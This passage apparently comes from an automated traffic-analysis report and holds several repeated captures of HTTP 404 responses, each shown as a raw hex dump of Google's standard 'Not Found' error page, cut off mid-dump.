                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 